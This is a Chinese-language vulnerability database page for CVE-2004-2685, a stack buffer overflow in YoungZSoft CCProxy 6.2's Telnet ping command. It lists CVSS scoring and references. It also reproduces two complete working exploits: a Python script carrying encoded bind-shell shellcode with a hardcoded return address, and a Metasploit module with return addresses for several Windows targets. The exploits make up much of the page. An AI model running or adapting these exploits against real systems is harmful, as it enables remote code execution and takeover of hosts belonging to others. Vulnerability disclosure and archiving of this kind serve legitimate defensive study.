CVE-2004-2685
CVSS7.5
发布时间 :2004-12-31 00:00:00
修订时间 :2008-09-05 16:44:50
NMCOE    

[原文]Buffer overflow in YoungZSoft CCProxy 6.2 and earlier allows remote attackers to execute arbitrary code via a long address in a ping (p) command to the Telnet proxy service, a different vector than CVE-2004-2416.


[CNNVD]@Youngzsoft Youngzsoft CCProxy 缓冲区溢出漏洞(CNNVD-200412-1009)

        YoungZSoft CCProxy 6.2及其早期版本存在缓冲区溢出漏洞。远程攻击者借助Telnet代理服务的ping(p)命令中的超长地址执行任意代码,该向量不同于CVE-2004-2416。

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: NETWORK [攻击者不需要获取内网访问权或本地访问权]
身份认证: NONE [漏洞利用无需身份认证]

- CWE (弱点类目)

CWE-119 [内存缓冲区边界内操作的限制不恰当]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2004-2685
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2004-2685
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200412-1009
(官方数据源) CNNVD

- 其它链接及资源

http://www.youngzsoft.net/ccproxy/whatsnew.htm
(UNKNOWN)  MISC  http://www.youngzsoft.net/ccproxy/whatsnew.htm
http://www.milw0rm.com/exploits/621
(UNKNOWN)  MILW0RM  621
http://www.milw0rm.com/exploits/4360
(UNKNOWN)  MILW0RM  4360
http://secunia.com/advisories/13085
(VENDOR_ADVISORY)  SECUNIA  13085

- 漏洞信息

@Youngzsoft Youngzsoft CCProxy 缓冲区溢出漏洞
高危 缓冲区溢出
2004-12-31 00:00:00 2007-09-07 00:00:00
远程  
        YoungZSoft CCProxy 6.2及其早期版本存在缓冲区溢出漏洞。远程攻击者借助Telnet代理服务的ping(p)命令中的超长地址执行任意代码,该向量不同于CVE-2004-2416。

- 公告与补丁

        

- 漏洞信息 (621)

CCProxy 6.2 (ping) Remote Buffer Overflow Exploit (EDBID:621)
windows remote
2004-11-10 Verified
23 KaGra
N/A [点击下载]
######################################################################
##  |------------------------------------------------------------|  ##
##  |    CCProxy 6.2 ping Remote Buffer Overflow Exploit         |  ##  
##  |      Based on Ruder's discovery,exploit by KaGra           |  ##  
##  |   Binds Shellcode aT 101,use netcat to connect back...     |  ##
##  |            Tested in WinXP SP1 EnGlish                     |  ##
##  |       Greedingz to:NinA,Coderz.gr and my musik BanD        |  ##
##  |------------------------------------------------------------|  ##
######################################################################

# Usage:exploit.py|nc Host port,where port is the telnet service of the target
# The buG exists when a long parameter is passed to ping command in telnet
# service of CCproxy server.This is a classic stack based overflow.Ret address
# is close to ESI,so a JMP ESI will do the trick.Other nops are just for padding...
#
#
#C:\exploit.py|nc localhost 23
#
#C:\nc -v localhost 101
#
#Microsoft Windows XP [Version 5.1.2600]
#(C) Copyright 1985-2001 Microsoft Corp.
#
#C:\Documents and Settings\xcv>





import struct

#BinD ShellCode aT PorT 101,taken from  muts exploit,thankz pul...

sc2 = "\xEB"
sc2 += "\x0F\x58\x80\x30\x88\x40\x81\x38\x68\x61\x63\x6B\x75\xF4\xEB\x05\xE8\xEC\xFF\xFF"
sc2 += "\xFF\x60\xDE\x88\x88\x88\xDB\xDD\xDE\xDF\x03\xE4\xAC\x90\x03\xCD\xB4\x03\xDC\x8D"
sc2 += "\xF0\x89\x62\x03\xC2\x90\x03\xD2\xA8\x89\x63\x6B\xBA\xC1\x03\xBC\x03\x89\x66\xB9"
sc2 += "\x77\x74\xB9\x48\x24\xB0\x68\xFC\x8F\x49\x47\x85\x89\x4F\x63\x7A\xB3\xF4\xAC\x9C"
sc2 += "\xFD\x69\x03\xD2\xAC\x89\x63\xEE\x03\x84\xC3\x03\xD2\x94\x89\x63\x03\x8C\x03\x89"
sc2 += "\x60\x63\x8A\xB9\x48\xD7\xD6\xD5\xD3\x4A\x80\x88\xD6\xE2\xB8\xD1\xEC\x03\x91\x03"
sc2 += "\xD3\x84\x03\xD3\x94\x03\x93\x03\xD3\x80\xDB\xE0\x06\xC6\x86\x64\x77\x5E\x01\x4F"
sc2 += "\x09\x64\x88\x89\x88\x88\xDF\xDE\xDB\x01\x6D\x60\xAF\x88\x88\x88\x18\x89\x88\x88"
sc2 += "\x3E\x91\x90\x6F\x2C\x91\xF8\x61\x6D\xC1\x0E\xC1\x2C\x92\xF8\x4F\x2C\x25\xA6\x61"
sc2 += "\x51\x81\x7D\x25\x43\x65\x74\xB3\xDF\xDB\xBA\xD7\xBB\xBA\x88\xD3\x05\xC3\xA8\xD9"
sc2 += "\x77\x5F\x01\x57\x01\x4B\x05\xFD\x9C\xE2\x8F\xD1\xD9\xDB\x77\xBC\x07\x77\xDD\x8C"
sc2 += "\xD1\x01\x8C\x06\x6A\x7A\xA3\xAF\xDC\x77\xBF\x77\xDD\xB8\xB9\x48\xD8\xD8\xD8\xD8"
sc2 += "\xC8\xD8\xC8\xD8\x77\xDD\xA4\x01\x4F\xB9\x53\xDB\xDB\xE0\x8A\x88\x88\xED\x01\x68"
sc2 += "\xE2\x98\xD8\xDF\x77\xDD\xAC\xDB\xDF\x77\xDD\xA0\xDB\xDC\xDF\x77\xDD\xA8\x01\x4F"
sc2 += "\xE0\xCB\xC5\xCC\x88\x01\x6B\x0F\x72\xB9\x48\x05\xF4\xAC\x24\xE2\x9D\xD1\x7B\x23"
sc2 += "\x0F\x72\x09\x64\xDC\x88\x88\x88\x4E\xCC\xAC\x98\xCC\xEE\x4F\xCC\xAC\xB4\x89\x89"
sc2 += "\x01\xF4\xAC\xC0\x01\xF4\xAC\xC4\x01\xF4\xAC\xD8\x05\xCC\xAC\x98\xDC\xD8\xD9\xD9"
sc2 += "\xD9\xC9\xD9\xC1\xD9\xD9\xDB\xD9\x77\xFD\x88\xE0\xFA\x76\x3B\x9E\x77\xDD\x8C\x77"
sc2 += "\x58\x01\x6E\x77\xFD\x88\xE0\x25\x51\x8D\x46\x77\xDD\x8C\x01\x4B\xE0\x77\x77\x77"
sc2 += "\x77\x77\xBE\x77\x5B\x77\xFD\x88\xE0\xF6\x50\x6A\xFB\x77\xDD\x8C\xB9\x53\xDB\x77"
sc2 += "\x58\x68\x61\x63\x6B\x90"


buffer = '\x90'*605         # The usual nops... 

RETADDR="\xc7\x41\xe6\x77"  # JMP ESI In XP SP1 EnGliSH...

buff2='\x90'*8              # padding...

print "ping "+buffer+sc2+RETADDR+buff2 # DeaD...

// milw0rm.com [2004-11-10]
		

- 漏洞信息 (4360)

CCProxy <= v6.2 Telnet Proxy Ping Overflow Exploit (meta) (EDBID:4360)
windows remote
2007-09-03 Verified
0 Patrick Webster
N/A [点击下载]
##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/projects/Framework/ 
##

require 'msf/core'

module Msf

class Exploits::Windows::Proxy::CCProxy_Telnet_Ping < Msf::Exploit::Remote
	
	include Exploit::Remote::Tcp

	def initialize(info = {}) 
		super(update_info(info,    
			'Name'		=> 'CCProxy <= v6.2 Telnet Proxy Ping Overflow',
			'Description'	=> %q{
            			This module exploits the YoungZSoft CCProxy <= v6.2 suite Telnet service.
				The stack is overwritten when sending an overly long address to the 'ping' command.
			},
			'Author' 	=> [ 'Patrick Webster <patrick[at]aushack.com>' ],
			'Arch'		=> [ ARCH_X86 ], 
			'License'       => MSF_LICENSE,
			'Version'       => '$Revision$',
			'References'    =>
			[
				[ 'BID', '11666 ' ],
				[ 'CVE', '2004-2416' ],
				[ 'MIL', '621' ],
				[ 'OSVDB', '11593' ],
			],         
			'Privileged'		=> false,
			'DefaultOptions'	=>
			{
				'EXITFUNC' 	=> 'thread',
			},
			'Payload' =>
				{ 
					'Space'		=> 1012,
					'BadChars' 	=> "\x00\x07\x08\x0a\x0d",
				},
			'Platform' => ['win'],
			'Targets' =>
			[
			# Patrick - Tested OK 2007/08/19. W2K SP0, W2KSP4, XP SP0, XP SP2 EN.
				[
				'Windows 2000 Pro All - English',
				{
					'Ret'	=> 0x75023411, # call esi ws2help.dll
				}
				],
				[
				'Windows 2000 Pro All - Italian',
				{
					'Ret'	=> 0x74fd2b81, # call esi ws2help.dll
				}
				],
				[
				'Windows 2000 Pro All - French',
				{
					'Ret'	=> 0x74fa2b22, # call esi ws2help.dll
				}
				],
                 		[
				'Windows XP SP0/1 - English',
				{
					'Ret'	=> 0x71aa1a97, # call esi ws2help.dll
				}
				],
                 		[
				'Windows XP SP2 - English',
				{
					'Ret'	=> 0x71aa1b22, # call esi ws2help.dll
				}
				],
			],
			'DisclosureDate' => 'Nov 11 2004'))
            
			register_options(
			[
				Opt::RPORT(23),
			], self.class)
	end

	def autofilter
		false
	end

	def check 
		connect
		banner = sock.get_once(-1,3)

		if (banner =~ /CCProxy Telnet Service Ready/)
			return Exploit::CheckCode::Appears 
		end
		return Exploit::CheckCode::Safe
	end

	def exploit
		connect
		
		sploit  = "p " + payload.encoded + [target['Ret']].pack('V') + make_nops(7)
		sock.put(sploit + "\r\n")

		handler
		disconnect
	end

end
end

# milw0rm.com [2007-09-03]
		

- 漏洞信息

45824
CCProxy Telnet Proxy Service Ping Command Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Public

- 漏洞描述

- 时间线

2004-11-10 Unknow
Unknow Unknow

- 解决方案

Products

Unknown or Incomplete

- 相关参考

- 漏洞作者

Unknown or Incomplete
 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站